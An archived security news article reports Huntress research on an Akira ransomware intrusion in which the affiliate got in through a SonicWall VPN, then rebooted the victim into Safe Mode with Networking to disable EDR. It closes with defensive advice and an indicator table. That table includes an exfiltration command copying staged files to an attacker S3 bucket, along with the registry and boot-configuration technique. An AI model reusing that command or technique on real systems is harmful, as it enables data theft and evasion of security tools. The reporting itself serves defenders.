Akira Ransomware Uses Windows Safe Mode to Shut Down EDR Before Launching Encryptor
Cybersecurity NewsArchived Aug 13, 2026✓ Full text saved
Akira ransomware has added a new way to weaken Windows security before it tries to lock files. In a recent intrusion, an affiliate rebooted a compromised system into Safe Mode with Networking, leaving the device connected while most third-party protections stayed offline. The operation began with a credential-spraying attack against an exposed SonicWall SSL VPN […] The post Akira Ransomware Uses Windows Safe Mode to Shut Down EDR Before Launching Encryptor appeared first on Cyber Security News .
Full text archived locally
✦ AI Summary· Claude Sonnet
HomeUncategorized
Akira Ransomware Uses Windows Safe Mode to Shut Down EDR Before Launching Encryptor
By Tushar Subhra Dutta
August 13, 2026
Akira ransomware has added a new way to weaken Windows security before it tries to lock files.
In a recent intrusion, an affiliate rebooted a compromised system into Safe Mode with Networking, leaving the device connected while most third-party protections stayed offline.
The operation began with a credential-spraying attack against an exposed SonicWall SSL VPN that had no multi-factor authentication.
A valid account opened the door, after which the intruder used remote desktop access, mapped the network, collected files, and prepared them for upload.
This route echoes the risks described in recent SonicWall VPN exploitation cases.
The attackers had already established a familiar, fast-moving playbook: entry through remote access infrastructure, rapid discovery of valuable systems, data theft, and then an encryption attempt within hours.
Huntress said in a report shared with Cyber Security News (CSN) that it identified this as its first observed Akira case using Safe Mode to impair endpoint detection and response tools.
The finding matters because the group was the most active ransomware operation the researchers tracked in 2025, and even a failed encryption attempt can leave stolen data available for extortion.
Akira Ransomware Uses Windows Safe Mode
After obtaining access on August 4, the operator reached the domain controller through Remote Desktop Protocol and ran commands to export details on every user and computer in Active Directory.
The files gave the attacker account names, group memberships, system information and other useful data for moving through the network. The group then archived mapped shares with WinRAR and sent staged files to cloud storage.
Attack chain (Source – Huntress)
Before launching the encryptor, the intruder installed AnyDesk as a service for remote control and file transfer.
They also changed the Safe Mode registry list so that AnyDesk could run after the reboot. At 06:29 UTC, a startup configuration change forced the computer into Safe Mode with Networking, a reduced Windows startup state that loads core services but keeps network access available.
That choice stopped the Huntress agent and disabled Microsoft Defender real-time protection.
It gave the attacker a temporary blind spot, while the specially enabled remote-access service preserved hands-on control.
The method resembles EDR-killer attacks through SSLVPN, but this case relied on Windows startup behavior rather than a malicious driver.
Safe Mode abuse is not new among ransomware groups, but its appearance in an Akira intrusion expands the ways defenders must think about endpoint coverage.
Security teams should treat unexpected boot-configuration changes, Safe Mode boot events, and security services stopping together as a high-priority warning, especially after unusual VPN login activity.
A failed encryptor still harms victims
The Safe Mode move did not produce the result the affiliate expected. Akira’s payload started at 06:34 UTC, but the system soon logged virtual-memory errors, followed by PowerShell failures.
Researchers concluded that the stripped-down Safe Mode environment appears to have left the ransomware process without enough available virtual memory, preventing encryption from taking hold.
Defender later detected the file as Ransom:Win32/Akira.B!ibt, yet it could not quarantine it while the computer remained in Safe Mode.
SonicWall log showing the spray (msg 33) resolving into a successful SSL VPN login (msg 1080) (Source – Huntress)
The cleanup succeeded only after the attacker rebooted into normal Windows at 08:10 UTC, restoring real-time protection.
That outcome was fortunate, not dependable: a machine with more memory or an adjusted payload could still encrypt data.
The incident also shows why encryption is not the only danger. Credentials and file shares had already been taken, creating leverage for a double-extortion demand.
Organizations should require MFA for every VPN account, restrict or temporarily disable exposed SSL VPN access during an active incident, rotate Active Directory and VPN credentials after compromise, and centralize VPN and Windows logs in a SIEM.
Teams should alert on bursts of failed logins across several usernames, then correlate them with a successful login from the same source or network provider.
They should also deploy endpoint coverage across every host, rather than only selected systems. These steps complement lessons from SonicWall firewall ransomware activity and help defenders spot an intrusion before data theft or encryption begins.
Indicators of compromise (IoCs):-
Type Indicator Description
IPv4 address 72.23.77[.]35 External source IP for the successful SSL VPN login used for initial access
Hostname WIN-DNCVG09TAT8 Attacker-controlled workgroup jump-host seen in RDP and logon events
File paths C:\ProgramData\AdUsers.txt, C:\ProgramData\AdComp.txt Active Directory enumeration output
Command WinRAR.exe a -ep1 -scul -r0 -iext -imon1 … Command used to archive file shares
Command s5cmd cp --sp "<staging_path>" s3://<attacker-bucket>/ Command used for exfiltration to an attacker-controlled S3 bucket
File and SHA-256 S5cmd.exe
e2356c742c74cce5c6b6100162d0071a3f71e2fed2ed895c2011061a95b3299a S3 exfiltration tool detected as HackTool:Win32/SSCmd!dha
File and SHA-256 akira.exe
414b9985f46714f44dd1bd63860d2a48dcfababcfe5c712a4b4f575378127a56 Akira ransomware payload
AnyDesk Client ID 1778787240 Remote operator peer that transferred the payload
Windows event indicators Kernel-Boot EID 27 SAFEBOOT:NETWORK
Kernel-General EID 12 BootMode=2 Windows events indicating a Safe Mode with Networking boot
Process and behavior msconfig.exe boot-configuration change → reboot Safe Mode boot behavior associated with defense impairment
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Stop new phishing & malware before they compromise your business. Integrate live intel from 15K SOCs around the world
Copy URL
Linkedin
Twitter
ReddIt
Telegram
Tushar Subhra Dutta
Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
Cyber Security Guide
Top 10 Malware Threats of the Week – AsyncRAT, Remcos, and Xworm Lead the Surge
Three PhaaS Kits Targeting US Organizations to Steal M65 Logins by Bypassing MFA
How Top SOCs Detect and Stop AI Phishing that Beats Email Gateways
Top 10 Phishing Kits Used by Hackers to Launch Cyberattacks (July 20-26, 2026)
An SOC Story of Why Fast Answers Beat Perfect Answers in Cyber Incident Response
Latest Cyber News
Adobe
Critical Adobe Commerce Vulnerabilities Allows Hackers to Execute Arbitrary Code
Cyber Security
Cisco Firewall 0-Day Vulnerability Exploited in the Wild to Trigger DoS Condition
Cyber Security
Critical WordPress RCE Vulnerability Allows Authors to Execute Code via Malicious PNG File
Cyber Security News
Palo Alto Networks Patches 11 New Vulnerabilities Across PAN-OS, GlobalProtect, and Prisma Access
Cyber Attack News
New “City-Forum” Hackers Attacking Salesforce and ServiceNow Instances Worldwide
Expert Talks
Expert Talks
From Reactive Forensics to Predictive Defence: Strengthening Cyber Resilience in Banking
Expert Talks
Beyond the Lure: What the DoNot Campaign Reveals About Modern Cyber Espionage
Expert Talks
Your Incident Response Plan Has a Dependency You Never Approved
Expert Talks
Security in the AI Era Starts with First Principles
Cyber Security News
Planning Your AI Security – How will You Manage All Your Resources?